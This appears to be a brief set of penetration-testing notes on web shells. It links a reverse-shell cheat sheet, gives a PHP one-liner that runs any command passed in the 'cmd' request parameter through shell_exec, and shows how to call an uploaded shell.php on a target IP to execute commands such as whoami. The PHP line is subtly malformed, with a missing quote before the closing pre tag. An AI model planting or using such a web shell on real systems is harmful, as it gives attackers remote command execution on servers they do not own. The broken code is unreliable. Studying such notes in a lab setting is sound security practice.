# Cheat sheets
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet


# Webshells
[Nice article](https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/)

## PHP

### Webshell: create a request endpoint

```php
<?php
    echo "<pre>" . shell_exec($_REQUEST['cmd']).</pre>";
?>
```
> Using `<pre>` tags we can format the output sent back to us  

Uploading this as a file allows us to make requests using `cmd` parameter and passing a command, for example: asuming the target IP is `10.10.10.1` and this PHP file uploaded to the main path with `shell.php` as its name, we could use:

`http://10.10.10.1/shell.php?cmd=whoami`

We are passing the command `whoami` which should execute on the target machine.
